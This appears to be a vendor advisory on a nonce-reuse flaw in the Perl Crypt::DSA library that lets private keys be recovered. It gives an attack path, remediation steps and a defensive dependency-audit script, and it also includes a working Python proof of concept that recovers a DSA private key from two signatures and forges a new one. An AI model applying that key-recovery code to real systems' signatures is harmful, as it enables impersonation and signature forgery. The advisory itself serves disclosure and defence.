External risk intelligence

Crypt::DSA Reused Nonce Vulnerability Allows Private Key Recovery.

CVE advisory. Severity: CRITICAL (CVSS 9.1)

CVE-2026-12205

A vulnerability in the Crypt::DSA Perl library allows attackers to recover private keys if a key is used for multiple signatures. This could lead to the exposure of sensitive information and the ability to forge signatures. It is uncertain how widely this library is used within the environment, necessitating confirmati

Halo Surface Signal (score: 1)

External exposure likelihood

Halo Surface Signal score for CVE-2026-12205

This vulnerability resides in the Crypt::DSA Perl library, a code library embedded in applications rather than a standalone network service. Exposure depends entirely on how third-party applications integrate the library's signing functions and on whether the signatures they produce are visible to outsiders. Because the library exposes no public interface or appliance by design, its inherent surface signal remains very low.

PCI scan relevance

PCI Relevance for CVE-2026-12205

Yes

CVE-2026-12205 — Halo PCI Relevance: Yes. Under typical PCI ASV external scan criteria, this issue may be flagged for scan prioritization.

This vulnerability allows for private key recovery due to cryptographic flaws in signature generation, which is a critical issue that could impact systems handling payment card data and require remediation for PCI compliance.

Scan-prioritization guidance only—not a PCI DSS certification or ASV attestation.

Horizon Alert

Summary of the vulnerability and why it matters

A vulnerability has been identified in the Crypt::DSA library for Perl that allows recovery of a DSA private key from signatures made with it. Because affected versions reuse the per-signature nonce, any key that has signed two or more different messages with an affected version should be considered compromised. The immediate concern is to confirm whether this library is in use within our systems and, if so, to what extent.

  • Crypt::DSA reuses the signing nonce across signatures made with the same key.
  • A recovered private key lets an attacker forge signatures that verify under the victim's public key.
  • Confirm usage, rotate affected keys, and assess potential impact.

Attack Path

How an attacker could exploit the issue

An attacker does not need access to the signing system. It is enough to obtain two signatures produced with the same DSA key over different messages, for example signatures that are published, transmitted, or logged. Affected versions of the library reuse the same per-signature secret value (the nonce, k) for every signature made with a given key, and this is visible in the signatures themselves because both carry the same r component. With two such signatures the attacker solves for the nonce and then for the private key, after which they can forge signatures on arbitrary messages that verify under the victim's public key. DSA is a signature-only algorithm, so the impact is forgery and impersonation, not decryption.

  • Attacker obtains two signatures on different messages made with one key.
  • Reused nonce (identical r in both signatures) enables key recovery.
  • Compromised keys lead to forgery.

Live Threat

Current exploitation, exposure, and threat context

When Crypt::DSA is used to generate multiple signatures with the same key, an attacker could recover the private key. This occurs because the nonce used in signature generation is reused across all signatures created with a specific key.

  • Private keys could be exposed.
  • Multiple signatures with one key.
  • Attacker recovers private key.

Operational Fix

Recommended remediation, mitigation, and detection steps

Determining precise ownership requires understanding how the Crypt::DSA Perl library is integrated into your environment; application owners, platform teams, or development teams who use this library for signing operations are likely accountable. The first actionable step is to identify all systems and applications that utilize Crypt::DSA for signing, assess their business criticality and exposure, and then confirm the accountable owner before planning remediation.

  • Identify applications using Crypt::DSA.
  • Verify usage and business criticality.
  • Plan remediation with accountable owners.

Validate whether this threat affects your internet-facing exposure.

Halo Threat Intelligence helps prioritize remediation with Halo Surface Signal and H/A/L/O context. Start exposure validation with a free external attack surface trial.

Frequently asked questions

What is Crypt::DSA?

Crypt::DSA is a software library written in Perl used by developers to perform Digital Signature Algorithm (DSA) operations. It provides functions to generate cryptographic keys and create digital signatures for data. Because it is a code-level library, it is typically embedded as a dependency within custom applications or other software rather than operating as a standalone program or network service.

What is the vulnerability in CVE-2026-12205?

The library suffers from a weakness known as CWE-323: Reusing a Nonce in a Cryptographic Operation. In secure cryptography, a 'nonce' (number used once) must be unique for every signature to keep the private key secret. CVE-2026-12205 means affected versions of Crypt::DSA mistakenly reuse the same nonce whenever the same key is used to sign multiple times, which mathematically reveals the underlying private key to anyone observing the signatures.

How does an attacker trigger this vulnerability?

An attacker needs the software to have produced at least two digital signatures with the same key pair over different messages (identical messages yield identical signatures and leak nothing new). The flaw is inherent to the library's internal logic and occurs automatically during repeated signing operations. It is not triggered by a specific network request or malformed input; the vulnerability exists whenever an affected version performs its standard signing function more than once with the same key without generating a fresh nonce.
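The key-recovery step described in the Attack Path, Live Threat and FAQ sections above, carried through in code. This is an added illustration, not code from this page or from Crypt::DSA: it implements textbook DSA in Python with a signer that models the described bug by choosing one nonce per key and reusing it, then recovers the private key from two signatures and forges a third. The parameter sizes (160-bit q, 512-bit p), the seeded RNG and the sample messages are demo assumptions, not values from the advisory.

```python
"""Toy DSA signer with a nonce stuck per key, plus private-key recovery from two
signatures. Added illustration of the attack path; it models the described bug
in plain Python and is not Crypt::DSA's code."""
import hashlib
import random


def is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin primality test (adequate for generating demo parameters)."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_params(rng, qbits=160, pbits=512):
    """DSA domain parameters (p, q, g): q prime, q | p-1, g of order q mod p."""
    while True:
        q = rng.getrandbits(qbits) | (1 << (qbits - 1)) | 1
        if is_probable_prime(q, rng):
            break
    while True:
        m = rng.getrandbits(pbits - qbits) | (1 << (pbits - qbits - 1))
        p = q * m + 1
        if is_probable_prime(p, rng):
            break
    while True:
        g = pow(rng.randrange(2, p - 1), (p - 1) // q, p)
        if g != 1:
            return p, q, g


def hash_int(msg):
    """H(m) as an integer; SHA-1 is 160 bits, matching the size of q here."""
    return int.from_bytes(hashlib.sha1(msg).digest(), "big")


def dsa_sign(params, x, msg, k):
    """Textbook DSA: r = (g^k mod p) mod q, s = k^-1 (H(m) + x r) mod q."""
    p, q, g = params
    r = pow(g, k, p) % q
    s = pow(k, -1, q) * (hash_int(msg) + x * r) % q
    assert r and s, "degenerate signature; a real signer retries with a new k"
    return r, s


def dsa_verify(params, y, msg, sig):
    """Textbook DSA verification against public key y = g^x mod p."""
    p, q, g = params
    r, s = sig
    if not (0 < r < q and 0 < s < q):
        return False
    w = pow(s, -1, q)
    v = (pow(g, hash_int(msg) * w % q, p) * pow(y, r * w % q, p) % p) % q
    return v == r


class StuckNonceSigner:
    """Models the bug described on this page: one k is chosen per key and then
    reused for every signature. This is a model, not the Crypt::DSA code."""

    def __init__(self, params, x, rng):
        self.params, self.x = params, x
        self.k = rng.randrange(1, params[1])  # chosen once, never refreshed

    def sign(self, msg):
        return dsa_sign(self.params, self.x, msg, self.k)


def recover_private_key(q, msg1, sig1, msg2, sig2):
    """Two signatures sharing k (hence r): k = (H1-H2)/(s1-s2), x = (s1 k - H1)/r mod q."""
    (r1, s1), (r2, s2) = sig1, sig2
    if r1 != r2:
        raise ValueError("r differs: nonces differ, this attack does not apply")
    h1, h2 = hash_int(msg1), hash_int(msg2)
    if (s1 - s2) % q == 0:
        raise ValueError("identical s: messages hash alike mod q, nothing to solve")
    k = (h1 - h2) * pow(s1 - s2, -1, q) % q
    x = (s1 * k - h1) * pow(r1, -1, q) % q
    return k, x


def demo(seed=2026):
    """Seeded only so the demo is reproducible; real keys and nonces need a CSPRNG."""
    rng = random.Random(seed)
    params = gen_params(rng)
    p, q, g = params
    x = rng.randrange(1, q)
    y = pow(g, x, p)
    victim = StuckNonceSigner(params, x, rng)
    m1, m2 = b"constructed message one", b"constructed message two"
    sig1, sig2 = victim.sign(m1), victim.sign(m2)  # the two signatures an attacker sees
    k, x_rec = recover_private_key(q, m1, sig1, m2, sig2)
    target = b"attacker-chosen message"
    forged = dsa_sign(params, x_rec, target, rng.randrange(1, q))
    return {
        "honest_signature_verifies": dsa_verify(params, y, m1, sig1),
        "same_r_in_both_signatures": sig1[0] == sig2[0],
        "recovered_key_matches": x_rec == x,
        "recovered_nonce_matches": k == victim.k,
        "forged_signature_verifies": dsa_verify(params, y, target, forged),
    }


if __name__ == "__main__":
    print(demo())
```

The shared r is also the defender's tell: if signatures already issued under one key carry identical r values, the nonce was reused and the key should be treated as recovered, whatever the library version claims.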

Is my system at risk according to Halo Surface Signal?

Halo Surface Signal rates external exposure as very unlikely because Crypt::DSA is a code library, not a public-facing service. Exposure depends entirely on whether your custom-built applications integrate this library to perform signing tasks and whether the resulting signatures leave your environment. Since the library has no network interface of its own, the threat is localized to the specific codebases where it is used for signing.

What should I do if I use Crypt::DSA?

First, audit your application dependencies to confirm if your software relies on an affected version of Crypt::DSA. If usage is confirmed, treat any private keys that have generated multiple signatures as compromised and revoke them immediately. Work with your development teams to update the library to version 1.21 or later, which resolves the nonce reuse, and rotate all keys involved in past signing operations.
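One way to carry out the identification step from the Operational Fix section and the dependency audit in the answer above. This is an added example in Python, not code from this page or from Crypt::DSA: it scans Perl sources and dependency manifests for the module, separates code that signs from code that only verifies (only signing keys need rotation), and flags declared minimum versions below 1.21, the fix version named on this page. The call patterns it matches (`use Crypt::DSA`, `Crypt::DSA->new`, `->sign(`), the decimal version comparison and the sample tree are assumptions about typical usage.

```python
"""Audit a Perl code base for Crypt::DSA usage. Added example for the triage
steps on this page; the Perl call patterns are assumptions about typical use,
not a specification of the module's API."""
import pathlib
import re

FIXED_VERSION = 1.21  # version this page says resolves the nonce reuse

# Module load, signer construction, and a signing call (assumed patterns).
LOADS_RE = re.compile(r"^\s*(?:use|require)\s+Crypt::DSA\b", re.M)
NEW_RE = re.compile(r"Crypt::DSA\s*->\s*new\b")
SIGN_RE = re.compile(r"->\s*sign\s*\(")
# cpanfile style: requires 'Crypt::DSA', '1.17';  Makefile.PL: 'Crypt::DSA' => '1.17'
REQ_RE = re.compile(r"""['"]Crypt::DSA['"]\s*(?:,|=>)\s*['"]?(\d+(?:\.\d+)?)""")


def load_tree(root):
    """Read Perl sources and dependency manifests under root into {path: text}."""
    root = pathlib.Path(root)
    manifests = {"cpanfile", "Makefile.PL", "Build.PL"}
    return {
        str(p.relative_to(root)): p.read_text(errors="replace")
        for p in root.rglob("*")
        if p.is_file() and (p.suffix in {".pm", ".pl", ".t"} or p.name in manifests)
    }


def audit(files):
    """files: {path: source_text}. Returns one finding per file that touches Crypt::DSA."""
    findings = []
    for path, src in sorted(files.items()):
        loads = bool(LOADS_RE.search(src))
        req = REQ_RE.search(src)
        if not loads and req is None:
            continue
        # Perl decimal versions (1.17 < 1.21) compare correctly as floats; an assumption.
        min_version = float(req.group(1)) if req else None
        findings.append({
            "path": path,
            "loads_module": loads,
            "constructs_signer": bool(NEW_RE.search(src)),
            "signs": loads and bool(SIGN_RE.search(src)),
            "min_version": min_version,
            # A declared minimum below the fix does not prove the installed
            # version is vulnerable; confirm on each host (see note below).
            "minimum_below_fix": min_version is not None and min_version < FIXED_VERSION,
        })
    return findings


def keys_to_rotate(findings):
    """Paths whose code signs with Crypt::DSA: their keys need rotation if an
    affected version was ever in use, since two signatures suffice for recovery."""
    return [f["path"] for f in findings if f["signs"]]


# Constructed sample tree (not a real project).
SAMPLE_FILES = {
    "cpanfile": "requires 'Crypt::DSA', '1.17';\nrequires 'JSON::PP';\n",
    "lib/App/Signer.pm": (
        "package App::Signer;\nuse strict;\nuse Crypt::DSA;\n"
        "my $dsa = Crypt::DSA->new;\n"
        "sub sign_blob { my ($key, $blob) = @_;\n"
        "  return $dsa->sign(Message => $blob, Key => $key); }\n1;\n"
    ),
    "bin/check-sig.pl": (
        "use Crypt::DSA;\nmy $dsa = Crypt::DSA->new;\n"
        "exit($dsa->verify(Message => $ARGV[0], Key => $pub, Signature => $sig) ? 0 : 1);\n"
    ),
    "lib/App/Other.pm": "package App::Other;\nuse Digest::SHA;\n1;\n",
}

if __name__ == "__main__":
    results = audit(SAMPLE_FILES)
    for finding in results:
        print(finding)
    print("rotate keys used by:", keys_to_rotate(results))
```

A declared minimum in a cpanfile is only a lower bound. Confirm what is actually installed on each host with `perl -MCrypt::DSA -e 'print "$Crypt::DSA::VERSION\n"'` before deciding whether the signatures that host produced require key rotation.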
